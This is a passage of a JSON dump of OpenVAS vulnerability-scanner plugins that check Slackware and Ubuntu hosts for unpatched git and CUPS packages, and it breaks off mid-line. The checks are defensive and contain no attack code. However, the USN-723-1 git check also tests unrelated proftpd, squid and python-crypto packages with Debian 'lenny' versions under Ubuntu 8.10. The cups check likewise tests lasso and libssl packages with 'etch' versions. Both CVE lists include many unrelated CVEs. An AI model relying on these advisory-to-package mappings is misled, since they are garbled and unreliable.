value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2008-3546\", \"CVE-2008-5516\", \"CVE-2008-5517\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2009-051-02 git\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(12\\.0|12\\.1|12\\.2)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2009-051-02\");\n\n script_tag(name:\"insight\", value:\"New git packages are available for Slackware 12.0, 12.1, 12.2, and -current to\nfix security issues.\n\nThere are other security issues related to gitweb, which Slackware does not\nship, but could be added to a Slackware install. These problems are also\nfixed with this update.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2009-051-02.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"git\", ver:\"1.6.1.3-i486-1_slack12.0\", rls:\"SLK12.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"git\", ver:\"1.6.1.3-i486-1_slack12.1\", rls:\"SLK12.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"git\", ver:\"1.6.1.3-i486-1_slack12.2\", rls:\"SLK12.2\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-12-04T11:28:15", "bulletinFamily": "scanner", "description": "The remote host is missing an update to git-core\nannounced via advisory USN-723-1.", "modified": "2017-12-01T00:00:00", "published": "2009-06-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64168", "id": "OPENVAS:64168", "title": "Ubuntu USN-723-1 (git-core)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_723_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_723_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-723-1 (git-core)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n git-core 1.1.3-1ubuntu1.1\n\nUbuntu 7.10:\n git-core 1:1.5.2.5-2ubuntu0.1\n gitweb 1:1.5.2.5-2ubuntu0.1\n\nUbuntu 8.04 LTS:\n git-core 1:1.5.4.3-1ubuntu2.1\n gitweb 1:1.5.4.3-1ubuntu2.1\n\nUbuntu 8.10:\n git-core 1:1.5.6.3-1.1ubuntu2.1\n gitweb 1:1.5.6.3-1.1ubuntu2.1\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-723-1\";\n\ntag_insight = \"It was discovered that Git did not properly handle long file paths. If a user\nwere tricked into performing commands on a specially crafted Git repository, an\nattacker could possibly execute arbitrary code with the privileges of the user\ninvoking the program. (CVE-2008-3546)\n\nIt was discovered that the Git web interface (gitweb) did not correctly handle\nshell metacharacters when processing certain commands. A remote attacker could\nsend specially crafted commands to the Git server and execute arbitrary code\nwith the privileges of the Git web server. This issue only applied to Ubuntu\n7.10 and 8.04 LTS. (CVE-2008-5516, CVE-2008-5517)\n\nIt was discovered that the Git web interface (gitweb) did not properly restrict\nthe diff.external configuration parameter. A local attacker could exploit this\nissue and execute arbitrary code with the privileges of the Git web server.\nThis issue only applied to Ubuntu 8.04 LTS and 8.10. (CVE-2008-5916)\";\ntag_summary = \"The remote host is missing an update to git-core\nannounced via advisory USN-723-1.\";\n\n \n\n\nif(description)\n{\n script_id(64168);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2008-3546\", \"CVE-2008-5516\", \"CVE-2008-5517\", \"CVE-2008-5916\", \"CVE-2008-3974\", \"CVE-2009-0318\", \"CVE-2008-5984\", \"CVE-2009-0352\", \"CVE-2009-0353\", \"CVE-2009-0354\", \"CVE-2009-0355\", \"CVE-2009-0356\", \"CVE-2009-0357\", \"CVE-2009-0358\", \"CVE-2009-0316\", \"CVE-2008-5557\", \"CVE-2008-5658\", \"CVE-2008-5624\", \"CVE-2008-5625\", \"CVE-2008-5985\", \"CVE-2009-0544\", \"CVE-2008-3964\", \"CVE-2008-5907\", \"CVE-2009-0040\", \"CVE-2008-1232\", \"CVE-2008-1947\", \"CVE-2008-2370\", \"CVE-2009-0520\", \"CVE-2008-4810\", \"CVE-2008-3663\", \"CVE-2007-5624\", \"CVE-2008-1360\", \"CVE-2007-5803\", \"CVE-2009-0187\", \"CVE-2007-3698\", \"CVE-2007-3922\", \"CVE-2008-5263\", \"CVE-2009-0615\", \"CVE-2009-0616\", \"CVE-2009-0617\", \"CVE-2009-0618\", \"CVE-2009-0620\", \"CVE-2009-0621\", \"CVE-2009-0622\", \"CVE-2009-0623\", \"CVE-2009-0624\", \"CVE-2009-0625\", \"CVE-2009-0490\", \"CVE-2009-0614\", \"CVE-2009-0542\", \"CVE-2009-0543\", \"CVE-2009-0478\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-723-1 (git-core)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-723-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"git-doc\", ver:\"1.1.3-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-email\", ver:\"1.1.3-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitk\", ver:\"1.1.3-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-arch\", ver:\"1.1.3-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1.1.3-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-svn\", ver:\"1.1.3-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-core\", ver:\"1.1.3-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-doc\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitk\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-arch\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-daemon-run\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-email\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-gui\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-p4\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-svn\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitweb\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-core\", ver:\"1.5.2.5-2ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-doc\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitk\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-arch\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-daemon-run\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-email\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-gui\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-svn\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitweb\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-core\", ver:\"1.5.4.3-1ubuntu2.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-doc\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitk\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-arch\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-daemon-run\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-email\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-gui\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-svn\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitweb\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-core\", ver:\"1.5.6.3-1.1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-crypto-dbg\", ver:\"2.0.1+dfsg1-2.3+lenny0\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-crypto\", ver:\"2.0.1+dfsg1-2.3+lenny0\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd-doc\", ver:\"1.3.1-17lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd\", ver:\"1.3.1-17lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd-basic\", ver:\"1.3.1-17lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd-mod-ldap\", ver:\"1.3.1-17lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd-mod-mysql\", ver:\"1.3.1-17lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"proftpd-mod-pgsql\", ver:\"1.3.1-17lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"squid-common\", ver:\"2.7.STABLE3-1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"squid\", ver:\"2.7.STABLE3-1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"squid-cgi\", ver:\"2.7.STABLE3-1ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:28:01", "bulletinFamily": "scanner", "description": "The remote host is missing an update to cupsys\nannounced via advisory USN-707-1.", "modified": "2017-12-01T00:00:00", "published": "2009-06-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64165", "id": "OPENVAS:64165", "title": "Ubuntu USN-707-1 (cupsys)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_707_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_707_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-707-1 (cupsys)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n cupsys 1.2.2-0ubuntu0.6.06.12\n\nUbuntu 7.10:\n cupsys 1.3.2-1ubuntu7.9\n\nUbuntu 8.04 LTS:\n cupsys 1.3.7-1ubuntu3.3\n\nUbuntu 8.10:\n cups 1.3.9-2ubuntu6.1\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-707-1\";\n\ntag_insight = \"It was discovered that CUPS didn't properly handle adding a large number of RSS\nsubscriptions. A local user could exploit this and cause CUPS to crash, leading\nto a denial of service. This issue only applied to Ubuntu 7.10, 8.04 LTS and\n8.10. (CVE-2008-5183)\n\nIt was discovered that CUPS did not authenticate users when adding and\ncancelling RSS subscriptions. An unprivileged local user could bypass intended\nrestrictions and add a large number of RSS subscriptions. This issue only\napplied to Ubuntu 7.10 and 8.04 LTS. (CVE-2008-5184)\n\nIt was discovered that the PNG filter in CUPS did not properly handle certain\nmalformed images. If a user or automated system were tricked into opening a\ncrafted PNG image file, a remote attacker could cause a denial of service or\nexecute arbitrary code with user privileges. In Ubuntu 7.10, 8.04 LTS, and 8.10,\nattackers would be isolated by the AppArmor CUPS profile. (CVE-2008-5286)\n\nIt was discovered that the example pstopdf CUPS filter created log files in an\ninsecure way. Local users could exploit a race condition to create or overwrite\nfiles with the privileges of the user invoking the program. This issue only\napplied to Ubuntu 6.06 LTS, 7.10, and 8.04 LTS. (CVE-2008-5377)\";\ntag_summary = \"The remote host is missing an update to cupsys\nannounced via advisory USN-707-1.\";\n\n \n\n\nif(description)\n{\n script_id(64165);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2008-5183\", \"CVE-2008-5184\", \"CVE-2008-5286\", \"CVE-2008-5377\", \"CVE-2009-0050\", \"CVE-2008-2383\", \"CVE-2007-4349\", \"CVE-2008-5077\", \"CVE-2009-0021\", \"CVE-2009-0025\", \"CVE-2008-5262\", \"CVE-2008-2237\", \"CVE-2008-2238\", \"CVE-2008-4314\", \"CVE-2008-5517\", \"CVE-2008-5516\", \"CVE-2008-3825\", \"CVE-2008-3997\", \"CVE-2008-4444\", \"CVE-2008-4006\", \"CVE-2008-5449\", \"CVE-2008-3979\", \"CVE-2008-3821\", \"CVE-2008-2382\", \"CVE-2008-5714\", \"CVE-2008-3818\", \"CVE-2009-0053\", \"CVE-2009-0054\", \"CVE-2009-0055\", \"CVE-2009-0056\", \"CVE-2008-5500\", \"CVE-2008-5503\", \"CVE-2008-5506\", \"CVE-2008-5507\", \"CVE-2008-5508\", \"CVE-2008-5511\", \"CVE-2008-5512\", \"CVE-2008-5256\", \"CVE-2008-5448\", \"CVE-2008-5718\", \"CVE-2007-4476\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-707-1 (cupsys)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-707-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libcupsys2-gnutls10\", ver:\"1.2.2-0ubuntu0.6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.2.2-0ubuntu0.6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.2.2-0ubuntu0.6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.2.2-0ubuntu0.6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.2.2-0ubuntu0.6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.2.2-0ubuntu0.6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.2.2-0ubuntu0.6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.2.2-0ubuntu0.6.06.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.3.2-1ubuntu7.9\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.3.2-1ubuntu7.9\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.3.2-1ubuntu7.9\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.3.2-1ubuntu7.9\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.3.2-1ubuntu7.9\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.3.2-1ubuntu7.9\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.3.2-1ubuntu7.9\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.3.2-1ubuntu7.9\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.3.7-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.3.7-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.3.7-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.3.7-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.3.7-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.3.7-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.3.7-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.3.7-1ubuntu3.3\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups-common\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-dbg\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups-bsd\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups-client\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups-dbg\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcups2-dev\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcups2\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.3.9-2ubuntu6.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-lasso\", ver:\"0.6.5-3+etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblasso-java\", ver:\"0.6.5-3+etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblasso3-dev\", ver:\"0.6.5-3+etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-lasso\", ver:\"0.6.5-3+etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblasso3\", ver:\"0.6.5-3+etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.8c-4etch4\", 